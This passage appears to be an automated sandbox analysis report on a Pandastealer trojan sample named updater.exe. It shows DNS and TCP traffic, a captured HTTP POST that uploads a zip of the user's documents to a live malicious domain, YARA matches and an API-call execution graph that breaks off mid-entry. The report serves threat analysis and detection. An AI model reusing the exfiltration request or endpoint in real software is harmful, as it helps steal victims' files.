                                  Jul 4, 2023 11:17:57.798140049 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.798305035 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.798527002 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.798724890 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.798743010 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.798813105 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799045086 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799185038 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799201965 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799356937 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799516916 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799676895 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.799866915 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800048113 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800208092 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800406933 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800425053 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800534964 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800726891 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.800888062 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801054955 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801070929 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801203012 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801393986 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801541090 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801789999 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801806927 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.801852942 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.802054882 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.802236080 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803662062 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803684950 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803700924 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803716898 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803730965 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803745031 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803760052 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803774118 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803788900 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803802967 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803817034 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803824902 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803838968 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803853035 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803867102 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.803930044 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804112911 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804142952 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804280043 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804482937 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804497957 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804600954 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804824114 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804943085 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.804958105 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805156946 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805171967 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805290937 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805495024 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805651903 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805666924 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805686951 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.805840015 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806025028 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806042910 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806138992 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806386948 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806607962 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806624889 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806663036 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806840897 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.806876898 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807018042 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807032108 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807229042 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807379007 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807523012 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807538033 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807693958 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.807861090 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808043003 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808388948 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808404922 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808530092 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808779001 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808796883 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.808873892 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809027910 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809201002 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809248924 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809350014 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809509993 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809530020 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809544086 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809763908 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809779882 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809794903 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.809886932 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.810756922 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.810827971 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.810861111 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.810890913 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.810921907 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:57.810956001 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:58.051028967 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:17:58.051204920 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:18:28.031232119 CEST8049185141.8.192.151192.168.2.22
                                  Jul 4, 2023 11:18:28.035197973 CEST4918580192.168.2.22141.8.192.151
                                  Jul 4, 2023 11:18:56.140016079 CEST4918580192.168.2.22141.8.192.151
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 4, 2023 11:17:55.808142900 CEST5010853192.168.2.228.8.8.8
                                  Jul 4, 2023 11:17:55.884426117 CEST53501088.8.8.8192.168.2.22
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 4, 2023 11:17:55.808142900 CEST192.168.2.228.8.8.80xcd88Standard query (0)f0837288.xsph.ruA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 4, 2023 11:17:55.884426117 CEST8.8.8.8192.168.2.220xcd88No error (0)f0837288.xsph.ru141.8.192.151A (IP address)IN (0x0001)false
                                  Jul 4, 2023 11:18:05.181360006 CEST8.8.8.8192.168.2.220xe6b3No error (0)windowsupdatebg.s.llnwi.net178.79.225.0A (IP address)IN (0x0001)false
                                  Jul 4, 2023 11:18:05.181360006 CEST8.8.8.8192.168.2.220xe6b3No error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)false
                                  • f0837288.xsph.ru
                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249185141.8.192.15180C:\Users\user\Desktop\updater.exe
                                  TimestampkBytes transferredDirectionData
                                  Jul 4, 2023 11:17:56.079627991 CEST0OUTPOST /collect.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
                                  User-Agent: uploader
                                  Host: f0837288.xsph.ru
                                  Content-Length: 1638104
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Jul 4, 2023 11:17:56.079782009 CEST0OUTData Raw: 2d 2d 53 65 6e 64 46 69 6c 65 5a 49 50 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 6e 61
                                  Data Ascii: --SendFileZIPBoundaryContent-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"Content-Type: application/zip
                                  Jul 4, 2023 11:17:56.094963074 CEST2OUTData Raw: 50 4b 03 04 14 00 02 00 08 00 34 5a e4 56 74 f9 e2 4f 84 02 00 00 02 04 00 00 1b 00 11 00 46 69 6c 65 73 2f 41 6c 62 75 73 2f 44 55 55 44 54 55 42 5a 46 57 2e 64 6f 63 78 55 54 0d 00 07 e6 ff a3 64 e6 ff a3 64 e6 ff a3 64 15 93 47 ae 65 21 0c 05
                                  Data Ascii: PK4ZVtOFiles/user/DUUDTUBZFW.docxUTdddGe!-EM_H7E1s2"^9kq'XTF{CklRMljj> :2"5=E`{amXzLw.6z5]axcgnR:ybv]
                                  Jul 4, 2023 11:17:56.249603033 CEST3OUTData Raw: 73 3b 79 94 cb 87 73 3d e1 8e 01 c5 7c fb ea f8 54 29 ea 23 4f 35 41 3d d1 dd 98 a4 c7 c0 f1 a8 b1 6f a6 92 df 1e 88 ce 1a d0 af 86 dd 15 8b 14 f3 20 c3 de a6 66 3e 99 c2 89 eb 5c 94 96 2d 38 de 2f 62 3f e6 33 ef da 4a f6 37 df 06 df 59 27 b9 eb
                                  Data Ascii: s;ys=|T)#O5A=o f>\-8/b?3J7Y'4u<Ol(5$1bVx+Y']-46WW3VfL%OPK4ZVtOFiles/user/(2) DUUDTUBZFW.docxUTdddGe!-E
                                  Jul 4, 2023 11:17:56.265000105 CEST6OUTData Raw: 5f 8f aa b5 1c ec 30 fc 4d bc 95 d7 80 fb 29 68 e7 b4 a0 ca cb 86 bb 5b 45 f2 f8 10 52 6f 29 d9 78 54 90 68 80 ed b6 5f b3 92 33 aa 65 76 cf 94 26 dc d4 ea 85 8f 58 95 3e c4 e8 89 a4 a7 aa 03 47 5a 3d d7 8c dd 71 ab b1 b8 51 ac af b3 1f bd 9e cb
                                  Data Ascii: _0M)h[ERo)xTh_3ev&X>GZ=qQ{k5^#=xt r4&NtbO}sYja,c(jQ+Ex_@.+Y!cfy~3_z8C1\/GS]p_ez~78BN/\iSfwO`wZs
                                  Jul 4, 2023 11:17:56.424361944 CEST9OUTData Raw: fd ab 0d 60 f8 75 7a 1d 23 75 ab eb fe da 5e 92 82 37 11 43 d6 f9 d0 9e 71 d9 91 79 0e 47 1d bd 19 2d 14 b1 d0 14 92 e5 d4 98 a5 7e 76 ae 2a b4 71 c2 8a 2a 55 b8 d6 f2 fe f2 4c a7 a6 5e 6e 35 56 3b 56 58 3e 60 bb 1b ba 15 1a 50 e6 e0 5f 45 8c 35
                                  Data Ascii: `uz#u^7CqyG-~v*q*UL^n5V;VX>`P_E5'q_Zt6s[xaF<:6B7a!ln.IW*nDvs-ZLb}Rm{]wFtKC[HaoB?M,@F18s|z
                                  Jul 4, 2023 11:17:56.434906960 CEST14OUTData Raw: 3c da ec e1 08 ed 6f 4a 32 c5 5e 5a 0a e5 ca 7a 0d 05 70 b9 4b 4b 29 8b 50 e6 c8 ae a4 89 d7 0a 26 5c 62 e2 47 9c 77 f2 09 bd 38 e2 5f 8b 58 36 af c9 10 04 f7 16 78 cb 62 ef 56 4d 97 e4 17 fe 16 e7 f6 a2 c5 82 6e 28 df 5b 0b e1 49 47 b9 cd 06 3d
                                  Data Ascii: <oJ2^ZzpKK)P&\bGw8_X6xbVMn([IG=oU:+[$DG8ppo8@J?x<kgpR=`<M5).~9/yhHp*=m+7XGaD",*am8V5
                                  Jul 4, 2023 11:17:56.594460011 CEST19OUTData Raw: d9 94 7f 0b eb ad 31 12 fb c6 cb b8 6f 3a 03 33 bf 62 28 39 b9 23 1c a8 d5 c4 6d b3 50 68 d2 ae fe a7 1b c3 ee 74 a4 b6 ea 66 cb 14 60 5f 91 bb 51 e4 6b 96 ac 26 c2 bd 0c fd fb af 8e 6d 21 09 6b 9d bf ab ef c6 79 57 0f 73 23 13 61 df 7f b6 2b 11
                                  Data Ascii: 1o:3b(9#mPhtf`_Qk&m!kyWs#a+&Jfrx%P<vgn@-O^?2N`$I[da3B}v(d0mGf-we+_<%-}`t}
                                  Jul 4, 2023 11:17:56.604887009 CEST29OUTData Raw: 98 29 c6 5e 73 24 70 86 3e 8d ee 6f 09 51 e8 04 a5 44 ef ad e6 cd 07 14 a1 fb 51 f0 b7 b5 1d 15 13 8c 47 21 f7 41 73 10 2d 02 61 a8 dd a1 a1 f0 78 6c f8 19 d5 11 8f 82 13 96 09 e3 1e b4 81 7b f7 45 3f ed f2 ce 97 9a 51 c6 fd 01 e7 45 ab dc 5f 2e
                                  Data Ascii: )^s$p>oQDQG!As-axl{E?QE_.}" t&Qr2}qhP@c1/<Z)ZdW==`I,.]Q1rsrhFTvmW%-#w75Xj|sl^RHhvUI|
                                  Jul 4, 2023 11:17:56.764790058 CEST39OUTData Raw: fa f1 3b 98 bc f6 ec 4c 83 00 cd d5 3f 6d 90 17 bc 3c bf 49 dc c9 10 e2 16 c6 d1 aa 73 19 ec bd de cc 41 bd 35 c4 57 0c 69 af 19 c5 b0 a1 21 07 8f cd 5d e4 5d 1d 77 c9 8e 7a af 2e 3f c1 54 c5 d8 f0 e8 ad 1d aa c0 d5 8c dc e7 2b 8d a9 ab 1d 64 5e
                                  Data Ascii: ;L?m<IsA5Wi!]]wz.?T+d^u^8`-Kjf0#mhvz)_I!?;pV`"*D{ojryz+1c_M00>3Zrzi4FJc}OS21&f6
                                  Jul 4, 2023 11:17:56.775048971 CEST52OUTData Raw: 3e 8b b4 a9 32 33 46 da 6b a9 70 e3 b2 31 7b 3c 71 93 cf 4a 45 35 34 56 d9 02 f4 bd 15 51 2d 19 00 53 9b 10 6a 53 4e ff 97 85 fc 39 5b 49 68 0d 16 78 64 2d 17 0f 66 3c 40 28 95 23 d6 b7 07 dd d0 20 dc 2e 01 93 9d 14 53 83 22 af 6e d2 ab 55 b8 2f
                                  Data Ascii: >23Fkp1{<qJE54VQ-SjSN9[Ihxd-f<@(# .S"nU/>q~VkYD1):<XeI@0U7ZM SvV*GM?)"&>DsJEcfVoOlNid1nwn*w[q,
                                  Jul 4, 2023 11:17:58.051028967 CEST1636INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Tue, 04 Jul 2023 09:17:57 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: keep-alive


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Target ID:1
                                  Start time:11:17:58
                                  Start date:04/07/2023
                                  Path:C:\Users\user\Desktop\updater.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\updater.exe
                                  Imagebase:0x13b0000
                                  File size:698'280 bytes
                                  MD5 hash:5B7111AE32C04C641C56E81A6293EC48
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000000.988088444.0000000001437000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  Reputation:low

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:10%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:12.4%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:61
                                    execution_graph 60864 1420c90 60869 1420a66 60864->60869 60868 1420ccf 60870 1420a85 60869->60870 60871 1420a98 60870->60871 60875 1420aad 60870->60875 60879 1413529 18 API calls _Deallocate 60871->60879 60873 1420aa8 60873->60868 60876 142c45c 60873->60876 60875->60873 60880 1413529 18 API calls _Deallocate 60875->60880 60881 142be21 60876->60881 60878 142c477 60878->60868 60879->60873 60880->60873 60883 142be2d _unexpected 60881->60883 60882 142be34 60896 1413529 18 API calls _Deallocate 60882->60896 60883->60882 60884 142be5f 60883->60884 60888 142c3ee 60884->60888 60887 142be43 60887->60878 60889 142c410 60888->60889 60897 141af65 60889->60897 60892 142c424 60894 142c456 60892->60894 60927 1420123 60892->60927 60894->60887 60896->60887 60932 141adec 60897->60932 60899 141af7d 60899->60892 60900 142c47c 60899->60900 60953 142c1ca 60900->60953 60905 142c4ae 60905->60892 60907 142c5a2 GetFileType 60908 142c5f4 60907->60908 60909 142c5ad GetLastError __dosmaperr CloseHandle 60907->60909 60979 1428f59 SetStdHandle 60908->60979 60909->60905 60924 142c5e4 60909->60924 60910 142c577 GetLastError __dosmaperr 60910->60905 60911 142c525 60911->60907 60911->60910 60978 142c135 CreateFileW 60911->60978 60913 142c56a 60913->60907 60913->60910 60915 142c661 60918 142c668 60915->60918 60919 142c6a4 60915->60919 60916 142c615 60916->60915 60980 142c344 60 API calls 2 library calls 60916->60980 60981 14210e3 60918->60981 60919->60905 60921 142c720 CloseHandle 60919->60921 60996 142c135 CreateFileW 60921->60996 60923 142c74b 60923->60924 60925 142c755 GetLastError __dosmaperr 60923->60925 60924->60905 60997 1429121 SetStdHandle 60925->60997 60928 1420157 60927->60928 60929 142012e HeapFree 60927->60929 60928->60894 60929->60928 60930 1420143 60929->60930 60931 1420149 GetLastError 60930->60931 60931->60928 60933 141ae14 60932->60933 60934 141adfa 60932->60934 60935 141ae1b 60933->60935 60936 141ae3a 60933->60936 60947 141af9f HeapFree GetLastError _free 60934->60947 60942 141ae04 60935->60942 60948 141afe0 5 API calls __wsopen_s 60935->60948 60949 142741f 60936->60949 60940 141ae49 60941 141ae50 GetLastError __dosmaperr 60940->60941 60943 141ae76 60940->60943 60952 141afe0 5 API calls __wsopen_s 60940->60952 60941->60942 60942->60899 60943->60942 60945 142741f __fassign MultiByteToWideChar 60943->60945 60946 141ae8d 60945->60946 60946->60941 60946->60942 60947->60942 60948->60942 60950 1427430 MultiByteToWideChar 60949->60950 60950->60940 60952->60943 60954 142c205 60953->60954 60956 142c1eb 60953->60956 60998 142c15a 60954->60998 60956->60954 61003 1413529 18 API calls _Deallocate 60956->61003 60958 142c23d 60959 142c26c 60958->60959 61004 1413529 18 API calls _Deallocate 60958->61004 60963 142c2bf 60959->60963 61005 1413556 IsProcessorFeaturePresent 60959->61005 60962 142c343 60963->60905 60964 142900e 60963->60964 60965 142901a _unexpected 60964->60965 61024 141703f EnterCriticalSection 60965->61024 60967 1429021 60969 1429046 60967->60969 60972 14290b5 EnterCriticalSection 60967->60972 60975 1429068 60967->60975 61028 1428de8 60969->61028 60974 14290c2 LeaveCriticalSection 60972->60974 60972->60975 60974->60967 61025 1429118 60975->61025 60977 142c135 CreateFileW 60977->60911 60978->60913 60979->60916 60980->60915 61062 14291b2 60981->61062 60983 14210f9 61067 1429121 SetStdHandle 60983->61067 60984 14210f3 60984->60983 60985 142112b 60984->60985 60987 14291b2 __wsopen_s 18 API calls 60984->60987 60985->60983 60988 14291b2 __wsopen_s 18 API calls 60985->60988 60990 1421122 60987->60990 60991 1421137 CloseHandle 60988->60991 60989 1421151 60992 1421179 60989->60992 60993 142116d __dosmaperr 60989->60993 60994 14291b2 __wsopen_s 18 API calls 60990->60994 60991->60983 60995 1421143 GetLastError 60991->60995 60992->60905 60993->60992 60994->60985 60995->60983 60996->60923 60997->60924 60999 142c172 60998->60999 61000 142c18d 60999->61000 61009 1413529 18 API calls _Deallocate 60999->61009 61000->60958 61002 142c1bc 61002->60958 61003->60954 61004->60959 61006 1413562 61005->61006 61010 141337d 61006->61010 61009->61002 61011 1413399 ___scrt_fastfail 61010->61011 61012 14133c5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 61011->61012 61015 1413496 ___scrt_fastfail 61012->61015 61014 14134b4 GetCurrentProcess TerminateProcess 61014->60962 61016 140e288 61015->61016 61017 140e291 61016->61017 61018 140e293 IsProcessorFeaturePresent 61016->61018 61017->61014 61020 140e9ee 61018->61020 61023 140e9b2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 61020->61023 61022 140ead1 61022->61014 61023->61022 61024->60967 61036 1417087 LeaveCriticalSection 61025->61036 61027 1429088 61027->60905 61027->60977 61037 14200c6 61028->61037 61030 1428dfa 61034 1428e07 61030->61034 61042 141fe67 61030->61042 61031 1420123 _free 2 API calls 61033 1428e5c 61031->61033 61033->60975 61035 1428f36 EnterCriticalSection 61033->61035 61034->61031 61035->60975 61036->61027 61040 14200d3 std::_Locinfo::_W_Getdays 61037->61040 61038 14200fe RtlAllocateHeap 61039 1420111 61038->61039 61038->61040 61039->61030 61040->61038 61040->61039 61047 141d068 EnterCriticalSection LeaveCriticalSection numpunct 61040->61047 61048 141fa7f 61042->61048 61045 141fea1 InitializeCriticalSectionAndSpinCount 61046 141fe8c 61045->61046 61046->61030 61047->61040 61049 141faad 61048->61049 61052 141faa9 61048->61052 61049->61052 61055 141f9b8 61049->61055 61052->61045 61052->61046 61053 141fac7 GetProcAddress 61053->61052 61054 141fad7 __strnicoll 61053->61054 61054->61052 61060 141f9c9 ___vcrt_FlsSetValue 61055->61060 61056 141fa74 61056->61052 61056->61053 61057 141f9e7 LoadLibraryExW 61058 141fa02 GetLastError 61057->61058 61057->61060 61058->61060 61059 141fa5d FreeLibrary 61059->61060 61060->61056 61060->61057 61060->61059 61061 141fa35 LoadLibraryExW 61060->61061 61061->61060 61064 14291d4 61062->61064 61065 14291bf 61062->61065 61063 14291f9 61063->60984 61064->61063 61068 1413529 18 API calls _Deallocate 61064->61068 61065->60984 61067->60989 61068->61065 61069 13f326d 61072 13ee78e 61069->61072 61073 13ee7be 61072->61073 61074 13ee857 61072->61074 61073->61074 61229 13e8241 61073->61229 61076 13ee7e0 ___scrt_fastfail 61076->61074 61236 13ee36e 61076->61236 61079 13ee867 61128 13eea2d 61079->61128 61256 13ecec8 10 API calls 61079->61256 61082 13d06db 5 API calls 61082->61074 61084 13ee8b6 61084->61128 61257 13ee1a1 8 API calls 61084->61257 61085 13ee82b 61085->61074 61255 13d2264 10 API calls 61085->61255 61088 13eea5c 61090 13eeaa5 61088->61090 61259 13ed2d9 6 API calls 61088->61259 61089 13eea21 61089->61088 61089->61128 61258 13e42b1 9 API calls 61089->61258 61094 13eead6 61090->61094 61261 13dcd8e 8 API calls 61090->61261 61093 13eea79 61260 13dcdec 9 API calls 61093->61260 61262 13dce1b 8 API calls 61094->61262 61098 13eeae2 61263 13ee1d3 85 API calls 61098->61263 61099 13ee8d4 61099->61089 61100 13ee78e 85 API calls 61099->61100 61099->61128 61100->61099 61102 13eeaf3 61103 13eeb33 61102->61103 61264 13ed2d9 6 API calls 61102->61264 61106 13eebca 61103->61106 61109 13eeb50 61103->61109 61105 13eeb0e 61265 13dcd8e 8 API calls 61105->61265 61271 13dce1b 8 API calls 61106->61271 61267 13f1702 85 API calls ___scrt_fastfail 61109->61267 61110 13eeb22 61266 13dd120 9 API calls _LStrxfrm 61110->61266 61113 13eeb8d 61269 13ecef5 85 API calls 61113->61269 61114 13eeb65 61114->61113 61114->61128 61268 13dd0e0 5 API calls ___scrt_fastfail 61114->61268 61117 13eebb5 61270 13f2a3d 8 API calls 61117->61270 61118 13eebd3 ___scrt_fastfail 61123 13eecba 61118->61123 61118->61128 61130 13ef24e 61118->61130 61120 13eebc1 61122 13ef390 61120->61122 61324 13ed36a 9 API calls 61120->61324 61122->61128 61325 13ed84b 13 API calls 61122->61325 61272 13dce1b 8 API calls 61123->61272 61125 13eecc3 61273 13dce1b 8 API calls 61125->61273 61326 13d06db 61128->61326 61129 13ef278 61314 13ee4e8 11 API calls 61129->61314 61130->61129 61313 13e42b1 9 API calls 61130->61313 61132 13eecd0 61274 13dce1b 8 API calls 61132->61274 61134 13ef2b2 61315 13f1702 85 API calls ___scrt_fastfail 61134->61315 61137 13eecdd 61275 13ed2d9 6 API calls 61137->61275 61138 13ef2ca 61140 13ef2d5 61138->61140 61141 13ef2e3 61138->61141 61316 13e4789 9 API calls 61140->61316 61317 13ee615 85 API calls 61141->61317 61142 13eecfa 61276 13dcdec 9 API calls 61142->61276 61146 13ef2ee 61148 13ef30f 61146->61148 61318 13dcd8e 8 API calls 61146->61318 61147 13eed19 61277 13dcd8e 8 API calls 61147->61277 61319 13f2a3d 8 API calls 61148->61319 61150 13eed63 61278 13dcd8e 8 API calls 61150->61278 61152 13ef31b 61320 13ee5c6 9 API calls 61152->61320 61155 13eed78 61279 13dcd8e 8 API calls 61155->61279 61158 13ef326 61160 13ef341 61158->61160 61321 13e6745 85 API calls 61158->61321 61159 13eed8d 61280 13dcd8e 8 API calls 61159->61280 61322 13ecef5 85 API calls 61160->61322 61164 13eedae 61281 13dcd8e 8 API calls 61164->61281 61165 13ef35d 61323 13e4789 9 API calls 61165->61323 61168 13eedc0 61282 13dcd8e 8 API calls 61168->61282 61170 13eeddf 61283 13dcd8e 8 API calls 61170->61283 61172 13eedf1 61284 13ee5c6 9 API calls 61172->61284 61174 13eedff 61175 13eee1c 61174->61175 61285 13e6745 85 API calls 61174->61285 61286 13ecef5 85 API calls 61175->61286 61178 13eee40 61287 13dcd8e 8 API calls 61178->61287 61180 13eee52 61288 13ee4e8 11 API calls 61180->61288 61182 13eee6b 61289 13dcd8e 8 API calls 61182->61289 61184 13eee7a 61290 13dcd8e 8 API calls 61184->61290 61186 13eee98 61291 13f1702 85 API calls ___scrt_fastfail 61186->61291 61188 13eeeb0 61188->61128 61189 13eeec7 61188->61189 61292 13e64df 85 API calls 61188->61292 61204 13ef0b0 61189->61204 61299 13dcd8e 8 API calls 61189->61299 61300 13e64a7 85 API calls 61189->61300 61194 13eef42 61293 13dcd8e 8 API calls 61194->61293 61196 13ef17a 61304 13dcd8e 8 API calls 61196->61304 61197 13ef11f 61197->61196 61303 13dcd8e 8 API calls 61197->61303 61200 13ef194 61305 13dcd8e 8 API calls 61200->61305 61201 13eefb9 61295 13dcd8e 8 API calls 61201->61295 61204->61197 61301 13dcd8e 8 API calls 61204->61301 61302 13dd120 9 API calls _LStrxfrm 61204->61302 61205 13ef1ae 61306 13dcd8e 8 API calls 61205->61306 61206 13eef5d 61206->61201 61294 13e58fe 8 API calls 61206->61294 61210 13ef1c3 61307 